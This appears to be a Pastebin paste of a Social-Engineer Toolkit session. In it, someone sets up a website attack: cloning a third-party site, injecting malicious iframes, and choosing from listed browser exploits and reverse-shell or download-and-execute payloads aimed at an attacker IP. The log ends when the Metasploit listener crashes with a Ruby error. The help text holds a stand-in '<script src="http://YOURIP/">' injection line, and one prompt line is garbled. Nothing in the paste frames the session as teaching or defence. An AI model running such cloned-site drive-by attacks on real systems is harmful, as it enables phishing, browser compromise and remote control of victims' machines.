Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ..######..########.########
- .##....##.##..........##...
- .##.......##..........##...
- ..######..######......##...
- .......##.##..........##...
- .##....##.##..........##...
- ..######..########....##...
- [---] The Social-Engineer Toolkit (SET) [---]
- [---] Created by: David Kennedy (ReL1K) [---]
- [---] Version: 4.7.2 [---]
- [---] Codename: 'Headshot' [---]
- [---] Follow us on Twitter: @trustedsec [---]
- [---] Follow me on Twitter: @dave_rel1k [---]
- [---] Homepage: https://www.trustedsec.com [---]
- Welcome to the Social-Engineer Toolkit (SET). The one
- stop shop for all of your social-engineering needs.
- Join us on irc.freenode.net in channel #setoolkit
- The Social-Engineer Toolkit is a product of TrustedSec.
- Visit: https://www.trustedsec.com
- Select from the menu:
- 1) Social-Engineering Attacks
- 2) Fast-Track Penetration Testing
- 3) Third Party Modules
- 4) Update the Metasploit Framework
- 5) Update the Social-Engineer Toolkit
- 6) Update SET configuration
- 7) Help, Credits, and About
- 99) Exit the Social-Engineer Toolkit
- set> 1
- 01011001011011110111010100100000011100
- 10011001010110000101101100011011000111
- 10010010000001101000011000010111011001
- 10010100100000011101000110111100100000
- 01101101011101010110001101101000001000
- 00011101000110100101101101011001010010
- 00000110111101101110001000000111100101
- 10111101110101011100100010000001101000
- 01100001011011100110010001110011001000
- 00001110100010110100101001001000000101
- 01000110100001100001011011100110101101
- 11001100100000011001100110111101110010
- 00100000011101010111001101101001011011
- 10011001110010000001110100011010000110
- 01010010000001010011011011110110001101
- 10100101100001011011000010110101000101
- 01101110011001110110100101101110011001
- 01011001010111001000100000010101000110
- 11110110111101101100011010110110100101
- 11010000100000001010100110100001110101
- 011001110111001100101010
- [---] The Social-Engineer Toolkit (SET) [---]
- [---] Created by: David Kennedy (ReL1K) [---]
- [---] Version: 4.7.2 [---]
- [---] Codename: 'Headshot' [---]
- [---] Follow us on Twitter: @trustedsec [---]
- [---] Follow me on Twitter: @dave_rel1k [---]
- [---] Homepage: https://www.trustedsec.com [---]
- Welcome to the Social-Engineer Toolkit (SET). The one
- stop shop for all of your social-engineering needs.
- Join us on irc.freenode.net in channel #setoolkit
- The Social-Engineer Toolkit is a product of TrustedSec.
- Visit: https://www.trustedsec.com
- Select from the menu:
- 1) Spear-Phishing Attack Vectors
- 2) Website Attack Vectors
- 3) Infectious Media Generator
- 4) Create a Payload and Listener
- 5) Mass Mailer Attack
- 6) Arduino-Based Attack Vector
- 7) SMS Spoofing Attack Vector
- 8) Wireless Access Point Attack Vector
- 9) QRCode Generator Attack Vector
- 10) Powershell Attack Vectors
- 11) Third Party Modules
- 99) Return back to the main menu.
- set> 2
- The Web Attack module is a unique way of utilizing multiple web-based attacks
- in order to compromise the intended victim.
- The Java Applet Attack method will spoof a Java Certificate and deliver a
- metasploit based payload. Uses a customized java applet created by Thomas
- Werth to deliver the payload.
- The Metasploit Browser Exploit method will utilize select Metasploit
- browser exploits through an iframe and deliver a Metasploit payload.
- The Credential Harvester method will utilize web cloning of a web-
- site that has a username and password field and harvest all the
- information posted to the website.
- The TabNabbing method will wait for a user to move to a different
- tab, then refresh the page to something different.
- The Man Left in the Middle Attack method was introduced by Kos and
- utilizes HTTP REFERER's in order to intercept fields and harvest
- data from them. You need to have an already vulnerable site and in-
- corporate <script src="http://YOURIP/">. This could either be from a
- compromised site or through XSS.
- The Web-Jacking Attack method was introduced by white_sheep, Emgent
- and the Back|Track team. This method utilizes iframe replacements to
- make the highlighted URL link to appear legitimate however when clicked
- a window pops up then is replaced with the malicious link. You can edit
- the link replacement settings in the set_config if its too slow/fast.
- The Multi-Attack method will add a combination of attacks through the web attack
- menu. For example you can utilize the Java Applet, Metasploit Browser,
- Credential Harvester/Tabnabbing, and the Man Left in the Middle attack
- all at once to see which is successful.
- 1) Java Applet Attack Method
- 2) Metasploit Browser Exploit Method
- 3) Credential Harvester Attack Method
- 4) Tabnabbing Attack Method
- 5) Man Left in the Middle Attack Method
- 6) Web Jacking Attack Method
- 7) Multi-Attack Web Method
- 8) Create or import a CodeSigning Certificate
- 99) Return to Main Menu
- set:webattack>2
- The first method will allow SET to import a list of pre-defined web
- applications that it can utilize within the attack.
- The second method will completely clone a website of your choosing
- and allow you to utilize the attack vectors within the completely
- same web application you were attempting to clone.
- The third method allows you to import your own website, note that you
- should only have an index.html when using the import website
- functionality.
- 1) Web Templates
- 2) Site Cloner
- 3) Custom Import
- 99) Return to Webattack Menu
- set:webattack>2
- [-] NAT/Port Forwarding can be used in the cases where your SET machine is
- [-] not externally exposed and may be a different IP address than your reverse listener.
- set> Are you using NAT/Port Forwarding [yes|no]: no
- [-] Enter the IP address of your interface IP or if your using an external IP, what
- [-] will be used for the connection back and to house the web server (your interface address)
- 2.168.1.55ack> IP address or hostname for the reverse connection:19
- [-] SET supports both HTTP and HTTPS
- [-] Example: http://www.thisisafakesite.com
- set:webattack> Enter the url to clone:http://www.tblop.com
- Enter the browser exploit you would like to use [8]:
- 1) Java Applet JMX Remote Code Execution (UPDATED 2013-01-19)Java Applet JMX Remote Code Execution (2013-01-10)
- 2) Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (2012-12-27)
- 3) Java 7 Applet Remote Code Execution (2012-08-26)
- 4) Microsoft Internet Explorer execCommand Use-After-Free Vulnerability (2012-09-14)
- 5) Java AtomicReferenceArray Type Violation Vulnerability (2012-02-14)
- 6) Java Applet Field Bytecode Verifier Cache Remote Code Execution (2012-06-06)
- 7) MS12-037 Internet Explorer Same ID Property Deleted Object Handling Memory Corruption (2012-06-12)
- 8) Microsoft XML Core Services MSXML Uninitialized Memory Corruption (2012-06-12)
- 9) Adobe Flash Player Object Type Confusion (2012-05-04)
- 10) Adobe Flash Player MP4 "cprt" Overflow (2012-02-15)
- 11) MS12-004 midiOutPlayNextPolyEvent Heap Overflow (2012-01-10)
- 12) Java Applet Rhino Script Engine Remote Code Execution (2011-10-18)
- 13) MS11-050 IE mshtml!CObjectElement Use After Free (2011-06-16)
- 14) Adobe Flash Player 10.2.153.1 SWF Memory Corruption Vulnerability (2011-04-11)
- 15) Cisco AnyConnect VPN Client ActiveX URL Property Download and Execute (2011-06-01)
- 16) Internet Explorer CSS Import Use After Free (2010-11-29)
- 17) Microsoft WMI Administration Tools ActiveX Buffer Overflow (2010-12-21)
- 18) Internet Explorer CSS Tags Memory Corruption (2010-11-03)
- 19) Sun Java Applet2ClassLoader Remote Code Execution (2011-02-15)
- 20) Sun Java Runtime New Plugin docbase Buffer Overflow (2010-10-12)
- 21) Microsoft Windows WebDAV Application DLL Hijacker (2010-08-18)
- 22) Adobe Flash Player AVM Bytecode Verification Vulnerability (2011-03-15)
- 23) Adobe Shockwave rcsL Memory Corruption Exploit (2010-10-21)
- 24) Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow (2010-09-07)
- 25) Apple QuickTime 7.6.7 Marshaled_pUnk Code Execution (2010-08-30)
- 26) Microsoft Help Center XSS and Command Execution (2010-06-09)
- 27) Microsoft Internet Explorer iepeers.dll Use After Free (2010-03-09)
- 28) Microsoft Internet Explorer "Aurora" Memory Corruption (2010-01-14)
- 29) Microsoft Internet Explorer Tabular Data Control Exploit (2010-03-0)
- 30) Microsoft Internet Explorer 7 Uninitialized Memory Corruption (2009-02-10)
- 31) Microsoft Internet Explorer Style getElementsbyTagName Corruption (2009-11-20)
- 32) Microsoft Internet Explorer isComponentInstalled Overflow (2006-02-24)
- 33) Microsoft Internet Explorer Explorer Data Binding Corruption (2008-12-07)
- 34) Microsoft Internet Explorer Unsafe Scripting Misconfiguration (2010-09-20)
- 35) FireFox 3.5 escape Return Value Memory Corruption (2009-07-13)
- 36) FireFox 3.6.16 mChannel use after free vulnerability (2011-05-10)
- 37) Metasploit Browser Autopwn (USE AT OWN RISK!)
- set:payloads>1
- 1) Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker
- 2) Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker
- 3) Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker
- 4) Windows Bind Shell Execute payload and create an accepting port on remote system.
- 5) Windows Bind Shell X64 Windows x64 Command Shell, Bind TCP Inline
- 6) Windows Shell Reverse_TCP X64 Windows X64 Command Shell, Reverse TCP Inline
- 7) Windows Meterpreter Reverse_TCP X64 Connect back to the attacker (Windows x64), Meterpreter
- 8) Windows Meterpreter Egress Buster Spawn a meterpreter shell and find a port home via multiple ports
- 9) Windows Meterpreter Reverse HTTPS Tunnel communication over HTTP using SSL and use Meterpreter
- 10) Windows Meterpreter Reverse DNS Use a hostname instead of an IP address and use Reverse Meterpreter
- 11) Download/Run your Own Executable Downloads an executable and runs it
- set:payloads>11
- [*] Selecting Java Meterpreter as payload since it is exploit specific.
- set:payloads> Port to use for the reverse [443]:4242
- [*] Cloning the website: http://www.tblop.com
- [*] This could take a little bit...
- [*] Injecting iframes into cloned website for MSF Attack....
- [*] Malicious iframe injection successful...crafting payload.
- [*] Apache appears to be running, moving files into Apache's home
- ***************************************************
- Web Server Launched. Welcome to the SET Web Attack.
- ***************************************************
- [--] Tested on Windows, Linux, and OSX [--]
- [--] Apache web server is currently in use for performance. [--]
- [*] Moving payload into cloned website.
- [*] The site has been moved. SET Web Server is now listening..
- [-] Launching MSF Listener...
- [-] This may take a few to load MSF...
- /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require': no such file to load -- rubygems (LoadError)
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from <internal:gem_prelude>:158:in `load_full_rubygems_library'
- from <internal:gem_prelude>:270:in `const_missing'
- from /opt/metasploit/apps/pro/msf3/lib/msf/sanity.rb:40:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/core.rb:14:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console/driver.rb:2:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui/console.rb:11:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/msf/ui.rb:11:in `<top (required)>'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3/lib/fastlib.rb:374:in `require'
- from /opt/metasploit/apps/pro/msf3//msfconsole:136:in `<main>'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement